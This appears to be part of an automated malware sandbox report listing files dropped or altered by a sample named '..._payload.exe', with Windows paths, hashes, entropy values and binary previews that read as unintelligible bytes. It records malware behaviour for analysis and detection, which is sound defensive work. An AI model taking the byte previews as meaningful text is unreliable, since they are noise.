                                                                                                      Preview:regf.4....Kgb"x......c..@m.4 .1..T.B....8..]..akA.f>.q..IG..f.!R!L...H......H...*SH...:1.t.9.a..f.)xL~"...S..0...y.r..+..<.f.e..6v....^bV[......;x...+.K4.O.......m...y..j_.."....+.6..Db...I.)z.......M[;....$U.....?..N..P.b....'.Y"..DF1...:.d....!.3..8.L.c..=9Ng|wB-O.....P.9.t.3.....).........W.Jc.....M.*.Q~Y..6.:qT.1.:.u?._m..B.G....../..s]%..8......e.... H2....r..x...w..hJ(.Q.uK....mE.*`.$..UW.{...h..(.....y^...Z.......).R.,..21..A..Y.I...Dr8...z:q...A.o...V...B..B..o.hQj@Y./......(./...P.xx..O$....=.8wm\/.e.B.F..._.u..s.9..=?...ZC...)1.ra..~. KM8...u.|...b..o.F.......J........}$A8'O.. ...-.M.1.W.z$k\]X.....~kK.O......E.P..Q........9>...Bb...e..+}..$..6....,a]./.a..&........R.8k.......o.|.V<F..VV..x.....ov........:..8..y..b...Bm$4.{...cb1.".U.................3U...khG..g.x..b..I-.G...4S.d.U#.....F...Y....@nP..a...t.~...D.n...r....e....-.....$0.7.<7.M.;.........fU.U.c.....U.{.y..X`Ye..~.&t$.H.G.!..\yI$.ygm...DE,...h..N.|BQ).!.......H...LM.8

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\User.dat.LOG1

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.979083319191792
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:e+wURgZstQ+h/O3raS7knWc4dzY8FE7I0ng3T1hVCyp:ekWZMQM9EZd+nncT1hVHp
                                                                                                      MD5:9C366FC97269F0B186BEE810AFE6B266
                                                                                                      SHA1:51AFC5D53B3E34DB84989ADEF1FFAEC759C1F58E
                                                                                                      SHA-256:7DB9D5FEFE3AC1412A6893755FF889178EDD8DDE85C68799CDF528710F040350
                                                                                                      SHA-512:73FFDD95A494306A27C440AD94614E640C96663B27EC8464BA4B22E94ECFC7A733569EB001DE55D98AD933753FAD339B05F4357420B5670D34E7C052FF4AF073
                                                                                                      Malicious:false
                                                                                                      Preview:regf.... '....Lb.......`Jv.=@..6V......\..0nFOJ...E.fX..)h.Mr9.%0.`....h..\.dd.=:.....S...^..3..D...4.!.G.F..g>}....0.r.......j..^..F.4...Wa..~n..f]G.z.(.*K........x.,u.....T..a....D..j....-N6.1..=...v....T@.d. .....F......!I[.5.x..#[..t....1...>....@Jo.E'.4H...l..2....x.f$.[.mc......")..<mi.N..2J.....^..f...,<.v....O>..K!.R.0#&M...M..`D..5.=`.F|.O.+../...*\a.?.b..D.r.?.B.T,..k............u...:.......s.x.3../..Z...'...Ed.S.$O>..Im..cm..J.....k.a.N..`.~.....0.,...#....2(c.%.....".4O.n.y..._.....X...^.v.^gB....Y.w..{#.<C..-57g..G.a..Y.+>...37.hj.]g......D..B.._..w..P.......0.x.C..u..9d.MM.U...VL.M<.=.0$.B....0rY.\r...G...l....US..3.!.... 6..j.1...)|U.Ol...:&a...M,..UHyJ.e;Am.a.3n.X('..:.1...Q......5I.k.n`-(.2....<.9.e..x....p3ki....9.$*A..waw-.l..rW.cjN.\.A.f.yK?.+.j......-..C.*%... .....]G.`e...r..N.8.-...ktxz...[..\.m...$..9...c......W.mpo..92.......0U...........>.$...^......x..v8...8.4#'..w.2.!..f?..V0..I2...A......CH........R.o.#...V.h8.*&....

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\User.dat.LOG2

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.981374298043613
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:jhIfd4oh+vEOHQAg8m392vCm6uSPZonOdmWJfHm6tsjbdejR1DB8chhQVw7RF:jOfd4NrwAg8m3hm6DPRdmqfG6OjBCgcT
                                                                                                      MD5:72836FA81822BFBBBDCD4C6F4E4E86A6
                                                                                                      SHA1:C9B7EAB1E3D362AC619FE306A97797C9605F6E2A
                                                                                                      SHA-256:7F28E14D47EB90DCA02F07CA34CFC4E4D5BEECC752C95329344BB6E6D959BC7E
                                                                                                      SHA-512:E43098493C384563C89F10E2476D0D1CD1BCF4EF8D6AF8097AA74576B183CB633483410EA16116307D152036D70FAFCA2D47BDB1D37E86D653D7B7B9EA592B5B
                                                                                                      Malicious:false
                                                                                                      Preview:regf....6..kud............fg..-......Q.....=5...Mk..z.V........m.'.D...>L.)u.....9..b....'....A...;A..\.....g./...:.v.g.....o|...G.W..l..M..oIz...Ag.......@....@.OT.<.5...M..f..L....0..He....!.....4d.....p..BR.n..r.w.r..I.C..Z+>.5...zku..1i;?YC...02.Y..vy.....X{o.......T.^...tOA!%.......'k|.1.}...L.a.C..+!......o$.9>...w.I.GI..xl....Ur..<4W.S...7.C+.<l...R...6asG..M.ivd.B<.R.....H.j...MV...@i`.T.w... .>..UG3.P.N....]D..:.of..f....J..p.k"+..?.0...l.\J.&.8..2..Q.lZ.>.wv......J.>.+]..>eLsg.m.s.g.}.....}..Q.....:..e.(.......V.......*..C-.z.....0r.T3K.~K"...4.2Q~.F.raW.KE..%..@o...B2$^.F.o.....K.[.VT`M##..$:...*j..Az...H.sH....o...?.\..`.6&..x..9>\...v.7......wE]j..v.Y./t.$.~[.{:m.9..R..F..5oI."...!...U..[..?Bg..K`.+uG.K.s.\..7.[@.e..A.......?..J.,Q..y'.....I.-YNM..=7.-....).....X...g..|[s.%o..{.HS.e.)........2..........{.HCn...\g..3...Jj'.s.X.5'..u.C.%h.D..L...p......N}_...u.......*......C\..-..2......*D..Q...W....:S%.y....K.Ml[...:.\.z.IQ..t

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\UserClasses.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.9818509466355305
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Rpp8K4dLJv/9hOOzuOjKqgDEN98Qi5zNHt6+cRUGG6c9wwu9AOteZM:RL8K4NJHHdxKfDj/5zlt6La6s9y+M
                                                                                                      MD5:9A465851A94CEBEE1E9C2048FFAADFC3
                                                                                                      SHA1:18626985DDC4350741D3ACB7E6E1DFC365A759C2
                                                                                                      SHA-256:AB4A67F5FC2824223205B87E249DD682096E4301D8149C0C7287D097FB6AA772
                                                                                                      SHA-512:B469A1A35F0F4CCD932940DF301994A1FC30AA3E68EE88EE38C03988AC359B01CFDD24ACC8D6BAA8C34CEAA7B23DD91C880D52BC7C59CA8234A089BE4EED7B61
                                                                                                      Malicious:false
                                                                                                      Preview:regf......C3.@#...#.~.....Om.Bd.O..y.17.j.0..a..[.m..#...8.g*1.......[*.....aK...k.M...|9`.S..P..S..#T.e;.G.&.}.._..3........N.z4.........q{*.A'yrz.o...o.G......ol..q..l.=D^.O.......d.`U.}....U...5...'.*...D.."..e../i.UY.?".s...g..O.;..s?.E?......p:.?.Y.5..D.+..i:\...-`6p.p... ..Pn.r....M.".I.~.F...a.8....G-M..I%...OG*...]B...7.......YH.NM...".....O..%.p*.]...l^.x-...1_.".~~.W/g....S.....e.tI.......W~..L....R...o.....5.).....&.xk.b6.d....P..o..\.g.._;.7....5g.M.....w.g.j.u...8'.....'.x....3....LM...t....H.9.p...l...'.D...l..&.Q..F.._..G..7=sk..y..O....6.e..G).P..(p-.h.By..D#..T.k.t.])sA..U.J.`....Y..".....<.R.H...4r...I,..D.....R..m........;..E3yAqM...s.,..._?j#.....Z4...^.y.i.............D.*I........B!d.....>.@.g.>}c..M.]..'d..../.]....j.....P.=/.8.O}B.Qm^.BwX....K"o.......B.{..t.G.H...H.V.Tm.....Z...9....9...2.....C.2..v#ZW....e......E"..<..7..QtR<..r.....n...P"U...3.....ov,.w*.g...]..{k2:K...Z|L...T...*?......g.."#W.z......{.i.n.D..?

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\SystemAppData\Helium\UserClasses.dat.LOG1

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8526
                                                                                                      Entropy (8bit):7.97640359042976
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:6IDqUedtHoOL3tAG1kifM/mXUFOs5gtrh93HN2IBW3Cv:NDpIHL1kNmEXgtrh1wIBW3Cv
                                                                                                      MD5:4084192F39C4D32E0D2D1CFF02A11712
                                                                                                      SHA1:ACCC3D89417930C3C29C9CC58C7A3FDE3709E606
                                                                                                      SHA-256:160FCD8D05D12A10408F4EE660E9F14DB941B7DA6B572C0C451612F617B7B31F
                                                                                                      SHA-512:6BFA55CCB9860CE6E4DB17B37DB8AB76625A95814C808F34E96DC8E6509BBEB188707410F0828819EFF809C0F9822D34B611553EBC04636A03EDE35D421C159B
                                                                                                      Malicious:false
                                                                                                      Preview:regf.h.*.....mz.C..b..I........Q...A.2... c...!.c$.X..MZyG.K#D,H.0....y.(......4&>...p..n`...e.,P1...I..,..E.d./c..".kS......a.;.h..;..s.].=^..,]....D..0{v.......*+ .-^r...F.n...J.<u..n..Vr.nsc.Aj....&...+....?.m.@.....s..s...v ?...G.Z.....+.}.....@;....O.....*.0.D}.~..r..$e....D...i......f@.L>...z-6.ZgS.s]da...w<Y........H......3|q....i.....o.....<A6H.&..6J.q..ja%.28b.]~.....:... ...n..7..........D&F~T.....9p.....r~.a...p....T..9.r..NT\N.J.\..C...TU..~.+(7....jM.l.k=)_t.....),]5..o....-a..........B.n..^.....D-V?.n..\......"....:,.....UuVc1..I..g.....]L...*.Zp.*...i.A.;.f[.g?2..d.=z-..]. >.%C..W..u....>V.O5.|.^.|E.XD.}/K...p...ja]..z.!.).K.....W..u..E.Pp....l.B@..zN.......>.cC.8..]{L.,QWD.f.C....].........8...X9........^.....3t.e.c ......._..r..O.."0..7D.....O3..ff.CA..~T..u~.s.r.|.Z...;[.^..\8...30.+....F.c8...t.P.5...z.Y'3..(0....].....=D:4...!..\.6.>..........`... ...~_.0.. d^.sU)...P%d.wm .G...3z..7o..f.......@.......c...x7O.fURg

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1573198
                                                                                                      Entropy (8bit):1.330332717371014
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:PhVfL5iZ2zYg/FPlNYe9hSmrroVBY25npql+8loteusPvdijdQxYlJW1x9aJ0am:ZPM2zYUFPgEhP/ok4pz6QyPDxYK
                                                                                                      MD5:52AFB978CAAE80FD16500F3EF9F12A15
                                                                                                      SHA1:4180ED85910E7D28CFF4809BB3114F5B677956E6
                                                                                                      SHA-256:C10847BB48DE551F25000AB54D7590CC153EB48C96AA63FB0602F4D442BA1607
                                                                                                      SHA-512:D130DD3B88089E7D96CDA07DE8474FECBCDC0B3DE0E0DDD3A0AFF910866A3DE70370C733E4DA50F2936B6D8370D1DA32716253876DD3B146F45CC8C8E19F4A15
                                                                                                      Malicious:false
                                                                                                      Preview:..4t..l...7FA..8.\....,...8..e\.....e.$..<+....y...!.3..%.8.o.5m.o...N.\.P...9...b.._...q.W.S$...N.J...A......X.P*....,.E{...Q.c.....S.V~Fnq..T;...&..Y.U-.R?9......=.!..&.k./.'..j.C..}..-.-.3......oJ.. .GT.p..O.....q.8H].?......;uuT.@.lr.$..Nd.Sw.Vn.+o.KX.....dM.D...c.M.X^'.2...........YW.6..9].......-.[GqpK)l+..\..s...4|.`>..B...x'....i..S8(.64.{..!f..phG..-.....<y..g......x...[._.^. {2b..9..$....~r.T....q..+.dt..M.p.I...].....JH..|4..E..r+^...*R-....9y?..5..p..U......:Q.*.../?CV].Z.W..X.|...w...6n..b.K6S...n.C.M.......o.J.-...;....H......IRP.A..<.(._.z.1./M.._.uzF...q.....o6..v....`...SS..I5..L1.#(.;]...[*...A.^..p.W.C....k.t|J.U...n....B.V..}....L!.....B.T.....m.@..C.a......^..E$[A......../OE.0o.|#..N......G.s7...V..1.<...y.C..`z.1..O.....-..s..^@..O.;..@2..._L...RO.oe..R.M;<9..p.....U..$.f\..d3.:...QrP.\s.-R..N#..-..D....~A.V{.,,.T.>.....]..u.1.Q..@..._...XMbw.....b.l...>&..#......$H..Ex.t. .....MKT\._^h.O_...o....W..u^.[6Nl.

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.jfm

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16718
                                                                                                      Entropy (8bit):7.988698092257504
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:J/dK8OR8XKq7aQtaPA2qI+aja852TstMFlWebMXD4pY95KulevuAqc2:JGR+K3rPUBX8s0MFcebVI5BWjqc2
                                                                                                      MD5:3F9F7260B32B8E4C6AEE27CAC8DA6671
                                                                                                      SHA1:DFBD8E09925A03924209DC2F6BB0598AEB1D10C8
                                                                                                      SHA-256:2550CE0FF3FD98A45A29A20553DB933684CF4D4E28502BC8C403848FB1092141
                                                                                                      SHA-512:4288994A805E4FB1CAEF0518056848420FA2C9ACD394DE387AFD4985A8CC51EB2966219D65EB4DBC8EDAB075DEFADDB4135503742F1B35071729560E311DF307
                                                                                                      Malicious:false
                                                                                                      Preview:..}...A*E[i......[........g..7_:...s8w..H.X.d#.$...~..w2....."H......R5....3...X..Pq<Gz.Z./..1....p..Y.R.....7.B.Q....~...'.M.m.\.SD94......6f.x.....Y....I......?....W9..<B.....[..Ms...L6..6.).c.w!...QNh..U..\..a.{(..d..../....;.......2@.}..@3..K..d...Vu.J..D.o.._b.U..<[h3....l...3."K.Q..|..O.*......v...]l..<...Lu.8.....D......xKJ...eb-..^...]D}.q=.3k..b`.$..|..a.......]0.''.W7..&z.C......h....q...9O...K.Y....[...N<..gCV.J..ce.f.....[..z-b%.JP...R<..?hl.......o..<.h..U..y.[.?.....W1.........L..:.....spI]..QG......4............d.,......h.<$..4..{.!4M....j..?.R..."6..<..~..\.W)2e......E1..3..W%..s....Z..x..k.t...I.$J.i .Rbe.g{....k.R..d.(.....F.....#...!..@...F.7..x...<MQv.l39{3...){G[!U.....^=!..wu..%.2.f.....[@S....es....XH).Gt..5T...?..qW..8$.b#.... .}.0....R..M0hD.f.L...<...*...ve;n..h;.X...TI.i..G.Y........c........U..D......Y..d1r1L...<...3.........C.FR.~]..A[Z.[...!>n..x.1.....^.SO$.$.j..L.....iAT2......^...;.P...h..Yka....qq.J..

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\778a09af-71b3-49bb-83e6-36722d62514f.6dfb6b5d-10db-4868-b4ad-ef207a2dda1b.down_meta

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1726
                                                                                                      Entropy (8bit):7.890180411674537
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2KMEYyKhcal4pfWFdVVyBYNBm3wl2lxpcgFPrwD:Iy6cal4F0dzyBYNBAwl8xLPg
                                                                                                      MD5:DF4C69429AA1CDD3B999BD9C500835F4
                                                                                                      SHA1:C7079D54DB176B4616422A15E1B8D94363038B6C
                                                                                                      SHA-256:EF89D36973C7EBB5667928BE02D7EC1057D38709AE8769C48CB42607D0C19911
                                                                                                      SHA-512:77A04AF9E512E0C67BCC17D7EFDED52D666515F03FD9EEFA313D96A1879FCB710FC72849E8B70C930DE0618B5967BEDDD267455CEC1C8F75A2D86F745964F0E5
                                                                                                      Malicious:false
                                                                                                      Preview:h.t.t....C....TL....M...;..0n?A#.T...j.<D.......S..".<|..ET>...f.1.17%D2L.O..k.:.:. ............SJ..a3...0.}.._...,Kf......la.2.9]~.%..j"..xS.xF ].3...|@...Je...0.2..'.}v!.H......z\:.B...LY.%7.ET .:?%..&lh...a.R}.J...^.tD..5.h..c....<AN.. ....d.@8...MI.....).e...L...._5F..-..\....w.z.+Y...E......3...Im.....`..?IO~....E.6...e.J....j<|V*..8f.H...F8b...R.R.k>....*6.{.]W..v..h..........r?.b......n.B.....,'\.I...L..:lw*.J\.9$......,9.\.W#...x.U.t7.9..%...N.k.i....b....1~xD...zAd.S.m;..y...S.;.../J.*.m...7".n.~.l#... ..1c.J.!....|....T..,&..*..U.e*....[u.iv..i. p.o........(.o.../v..1.',..4.....=...T+.D.(.:.v.c.7..&e...F.....?..j..).a .....o...KC.$k.]i4......t[...P.......vc...GQ...>yAN...j......r...,..S....q.`..pZ.yw).GBX."%A..=.H..!.....[..I..,.._..zCG:...!.*..-........p.\.k......?.Wb....E]8..w..h......'.....`..L&b.9...B.h.B.^.V....=...h..E. .....&0..3..Ss&.|+\a..%..DDu_..}..g...h.P.0.....&l5...t.QB@.._.T.?..e7.........o.|

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\778a09af-71b3-49bb-83e6-36722d62514f.up_meta_secure

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1092
                                                                                                      Entropy (8bit):7.79613475719643
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:vOhVWbECqJ5Ub1NJhoiS3wFaQHe69g8S7ahFx9nv6bD:oRCqMAiS39QH93S7+twD
                                                                                                      MD5:490A406E8A21C0F60F2BB4D04AD45449
                                                                                                      SHA1:16F190FEBFEDE7E99641CA7154AF4158556A9BDC
                                                                                                      SHA-256:06D25B6BBE04E6F946DB9E2B0F7B8472FD91C4FA1D9A498B5E802D76E16939F4
                                                                                                      SHA-512:4830F2AF2D9B97EA9BF66EA98FFA11DBEF48988812ABB7A258A31CF51F30D52B7AA25888A6FE2289CDF53C178E587ABEF2B4154DB9A12D1F2E6A2D5F37885010
                                                                                                      Malicious:false
                                                                                                      Preview:.....n..?...5......E.#.$I....).>/uYp1F.{.Xr?q.../....r.w#......w-...9...I1.....a^"...q.....u...^..#.c.B...g.3=]..OY....Bu..4.r*....#G....*.....8 '84.p.]......H.P$.$...\..}...c=.pS;.n...).....N.....{|..a?|...w. 4.Jk..Xf....r....T..|CTF.@Okw_j....z..DdAxq..?ZO.0L....v..:.......`..A6....N.8.vLF..4.....w... ....*%{`....>..e.."..K...T...Df.o.o.~.7<...&....X9.v......./.../XAol.I.$"`m.M....8.a..r..M2....$..A...1.f..d5......Q..u.W ..h.Z..-u4............M$.}.......+.......]{... .. .E...k...L...e..69.P.w.'._..<.0..Z...V'.....Of..X..xu...=(3j.P.G\.T...=...RY....B..n=.F.Slf..5ZnE....|0..W.+.b.5...9<:...t...g.4E..j.......F.U2...!.i ..%n...."....*..O.....2..rA.>Ho...p.....du+O+.m0.p'.>.M.......1UG.K....z'>..Z...|L..`...,...N.'?.4....%..7.6.Y...0.....w.@.....ve.....Mg..Q.RjE.....ue.Ww..D?#.(U...B{;u....9.{...._.u\[/.{.WQ.L.......c....Db.o..H....2..[..s.....08wEI,d.k..........O.[PR.E.$y.....`t....B...........q....?l....../.........P%..

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\TokenBroker\Cache\e71e1300703d5395820e448840a760f0dd25ad50.tbres

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3084
                                                                                                      Entropy (8bit):7.925723506426057
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:6kUJn0l0mWNkc6HXdf2cIGpgCE/utZKZCHHLw6fy+r3x/SIbMzisCV7bwD:6dZ6Nf2SC1WtWcHE6aa6Ib1M
                                                                                                      MD5:746E33887EF5A29E76C30234330611F6
                                                                                                      SHA1:FA49AA812897EACA9C95EA91DFF365798FBDCE1B
                                                                                                      SHA-256:1AFC81756EF2E7ECA5A1FE37608B39D6DA944A450782008E25436B10EB0D4722
                                                                                                      SHA-512:69657E65559F3C1C9E13F4B925D051BED966FCFBCA91D6FBE45372A003F247371A1294B2A4F6A641D8507BD20242ADDF9728BDDE4CF725BECD6974E46C2BEBCC
                                                                                                      Malicious:false
                                                                                                      Preview:{.".TR..7.L.6o.........^.....H.v.p.q...j.s....^.f.f.w4s..1!..a:...zyw9>i...O....Pn`..L8...D....x..\...k..#M. .........z.k..:8./.w........N..L..]........s.K...'.."d.%}b..?...O..[/..cK.|..1..7.........K.`..u/No....5.E}g.\y.....K...r......b~..,.qG....ZUjv..o..__1.|"<...:.qQQX..b.HAd...{...."..B.........w.o...SE..`..]&=.:C..h....j.8c`a..a.<SA.;..4...^~...A~.%..u....../.P`...,.n...n.9....y.......Iizt../.]...0f.....9..P2k..{N~.R..q.F.y.%.q.|...[.G....W5. ......m*w..P....c...._..6....4......MzV......;T.m...,.YN.xE.........r}.H6..O..0.p~.3....N..\..w.%.3..:...G.c~.y..6.Q...m....w.....:...;\......T.RT..u\..Ov4)...B=z+....i.zQ..{....=......ID.. ...#....R.B.^v.....[..x4..\..F+....K.n6.N.).[:.qk|.Rb....bo..c....{.........M.Qv..7....*@^.4......n.by3..M9...>.).?...R5.I.k.9n..{...>....2...Hk..buT(..l....}.b...u...=....[.......Y.'y......T..[[....._..7z.K!.Zy..O..3J..._.......s".......M....X.E..$....i.qGe|9+..%..:.?I..e\.....$.B.Z9...U{Vv.vI..]......

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\95d9a2a97a42f02325559b453ba7f8fe839baa18.tbres

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3018
                                                                                                      Entropy (8bit):7.939507528022918
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:ku0BuxkSqS2wxThKrWBiy9872Sut5Frb0x/fILG/6XUznUbbMiaRotp8BwD:kuqF1S2wThKQkCVtAhfIu6X1+i
                                                                                                      MD5:AA3060F5BC0AD116E4F32FC320F4E17E
                                                                                                      SHA1:BFFD0D0F66D935E53DD58DF9A0A381181313E4C0
                                                                                                      SHA-256:8494C3C20C489587A9B11E0905C7A8F0D8A437A2F0A6AF1D019A37AD8B569F5E
                                                                                                      SHA-512:F465D48AD0F8DD5E3FA444D55500D3E61E16343067969047572ECBAD14D1C48EF940DDC9C1B59B0FEC5D5635CCB5923A0FF8D7DAEA1890DA6437A29618FC4B01
                                                                                                      Malicious:false
                                                                                                      Preview:{.".T./(T2F.i.R.*.u2..6.3..=d......k..N....a...zp!}:&..'..LesaQTQ.z..{4.Qu.84...O"o.....(.U.....~.Yg./.....d@...G...P.>. .]3.......j3...........x.=...*.jw.1.G..j8.E.....>.Li.}......;..z.F..l.9..n{...,0...t.-..3.v..p_.e...|i.eT..|..@q._>..W\9.&+.`..c..B.........._.s.............O.}>.C.4.6.%.6.i...[:.|...................y.,.M0..8.Y.E..aaD.J...h.C.*..L^...x..."......LY...2Yw.rH+..M.f........C..`Q..n..i....,s...4..oYWzFS..O.F..iF.a..G.E.H)Q}._..M..=.}WJ.cu.n.S....V.Z...,...$....V....d...4{..|........$...Z......3.^...A..T....y-....>....#7...E.e...^.f..B ...*lj..FiZ.ga..3*.!..i.....g%....NL..}..B.q.k....,.\.....A...F...2c..9......2,4/&y.Pi..._5.B{.n.....Gz%..:.....#..V4v.A..%l..;..Ng.|...........p@..C.X.2...N.>7d....~r..uI7..Z."......h...K....s....0j.Es.}...J...f..t.....Ym...3P.B.&.`.......e...$.iF.S2.`n.._..KD.m.twV_...>..<.)..,U..xg8..rX.N...co)z6.......n....K,&1...!Q..h...M..O..Bo......|..>(.#T-..*._>..W.(.}LTG}...wH........>W...]^[M

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\fbaf94e759052658216786bfbabcdced1b67a5c2.tbres

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2612
                                                                                                      Entropy (8bit):7.919113441154466
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:fSzfgWXNs3JVcSpnJxo+4UqAx0/NvTTzhhh5MAGnU9y4Inv8GD6RMHPAzwD:fufvm3JuSpn7BqAC/NvPzh5MlU9yjdPh
                                                                                                      MD5:FC1B5256332BDF2381B49DA95FFF24A4
                                                                                                      SHA1:CF75575FE944C06FC5AC7FBC45B47D63D28D6C63
                                                                                                      SHA-256:2616E825E53B67D1CBE5F0A8533BDCD706E36F54DB046C4B36B2D7E0254336D7
                                                                                                      SHA-512:CBBE04DBEB9DE7BD2F8533147C62AB1514CA90034E00B3E3156E95EC107D9E73A6B74DBFD6110E05533EAF63C6B980BECADFBD917EA42D49A9F145046AF9AC0C
                                                                                                      Malicious:false
                                                                                                      Preview:{.".T.j..B..>.....E'...bj.5..s.N.v4...-.A...G'e..H+.f...LJ+..Gk.....@...S...:....1.b.N.h3....L...J.n. .q..P...Ts..]........x."7.(...._U....+-.2.T.$.C!...A.i.f1r.}...s.H..BRf.....Q%.>.X....N...`U.9..=.9e.!..YR^..X......Ba.Q....>.i.lq".R...'..[+...l3..J....*.D..z?.{.P...@.......=.mb.fn1r..0#..n.........Jb....d....@.D..o.$.%u.Cf.....$...E.5Y.Y.d.H..W.b.J5.......|cD.'V....o.W......:..Y..`Gl....~nf.N".+..U8.L.A...d....5~C.t.........kF..n*...........I.H. ...p.Zz..!..H...O.9..:.....!O{.....O...FE.....`r..d.7.%.....w.j..C.<.'8!_......B.}.8.>Fa.~+.....C|s._t(eA...*...0'xuL..D..^%.;.|..............:.H>..v.1e!.-5.v.9....P]..0..:B.(.S=...j.L.H.b.X...[T.......y.c.{&n.._:`....qt....-W.V....B..z..].. Xz.. t....m.CJ....u..2..m......98...`...w.Yr..viq.Nv.......1qs.=.G.8.....;..k?&D._F<.&....Wi...*...).G..D..>.B`~.+fD..B.A.1H/Xo..@....M..P.C......T.ii.*...1..X.jk7'.k..<G......|+.H..........F....Z50......M.....i.f.].MEQ[....O.?.....}[.j.E...."._...s.z...v.

                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1573198
                                                                                                      Entropy (8bit):1.3190621721163636
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:TS5+GHaOezARm0TzqtkTo8pIwM5SRkDBioXC5wxtT0hn3v1v29aPae:T8+GeAAWk8p5RkQoX2wxt4hf1vT
                                                                                                      MD5:0A6479A2A76A05DC7BA5CB5E6F544F03
                                                                                                      SHA1:4ED180C2AF48D942CE5741D79ACCE5C8E3DAB88B
                                                                                                      SHA-256:D07880464C4F1E3D208731420717EA79F43FD4DF7E46B0F6F2B5414A779B6399
                                                                                                      SHA-512:4E55516FA1B71401E3FBD57F0B54F2FD6675ACD51B5CC39A35517F916E0B8C5FCFE6A0AA8FA7AAB0CB4D8AEB5956ADC0E7E83F4E6E83F388F7E550C8C82C2A64
                                                                                                      Malicious:false
